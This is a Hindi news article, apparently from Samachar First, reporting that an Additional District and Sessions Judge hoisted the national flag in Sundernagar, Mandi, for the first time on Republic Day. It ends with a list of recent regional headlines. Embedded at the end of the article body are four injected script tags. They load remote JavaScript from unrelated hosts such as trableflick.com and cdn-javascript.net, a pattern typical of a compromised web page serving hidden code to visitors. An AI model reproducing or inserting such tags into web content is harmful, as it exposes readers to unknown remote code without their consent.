Categories: हिमाचल

मंडीः सुंदरनगर में एडिशनल जज ने पहली बार गणतंत्र दिवस पर फहराया तिरंगा

<p>देश के 71वें गणतंत्र दिवस पर रविवार को पूरे देश सहित सुंदरनगर भी तिरंगे के रंग में सरोबार रहा। इस साल गणतंत्र दिवस सुंदरनगर न्यायालय के लिए एक विशेष दिन रहा क्योंकि पहली बार सुंदरनगर में स्थापित अतिरिक्त जिला एवं सत्र न्यायाधीश द्वारा तिरंगा फहराया गया। इस कार्यक्रम में अतिरिक्त जिला एवं सत्र न्यायाधीश सुंदरनगर हंसराज द्वारा बतौर मुख्यातिथि शिरकत कर राष्ट्रीय ध्वज को सलामी दी गई।</p>

<p>बता दें कि पिछले लगभग कई सालों से सुंदरनगर में अतिरिक्त जिला एवं सत्र न्यायालय की मांग चली आ रही थी। इसको लेकर प्रदेश के उच्च न्यायालय की लिटिगेंटस की समस्याओं और सुविधाओं के लिए हाल ही में सुंदरनगर में अतिरिक्त जिला एवं सत्र न्यायालय स्थापित किया गया है। कार्यक्रम का आगाज अतिरिक्त जिला एवं सत्र न्यायाधीश हंसराज द्वारा पुलिस गार्द सहित राष्ट्रीय ध्वज को सलामी देकर किया गया।</p>

<p>इसके बाद राजकीय वरिष्ठ माध्यमिक पाठशाला (कन्या) की छात्राओं द्वारा राष्ट्रगान गायन किया गया। इस अवसर पर मुख्यातिथि एडीजे हंसराज ने कहा कि संपूर्ण देश आज पूरे देश में गणतंत्रता दिवस धूमधाम से मना रहा है। उन्होंने कहा कि देश का संविधान सभी धर्म के लोगों को साथ में जोड़कर रखता है। उन्होंने कहा कि भारत का संविधान का सम्मान देश के सम्मान है। वहीं, सुंदरनगर बार एशोसिएशन के प्रधान पूर्ण सिंह सेन ने कहा कि यह हमारे लिए एक गर्व का विषय है की सुंदरनगर अतिरिक्त जिला एवं सत्र न्यायालय स्थापना के उपरांत पहली बार 26 जनवरी को ध्वजारोहण किया जा रहा है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580035727261″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

21 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

53 mins ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

1 hour ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago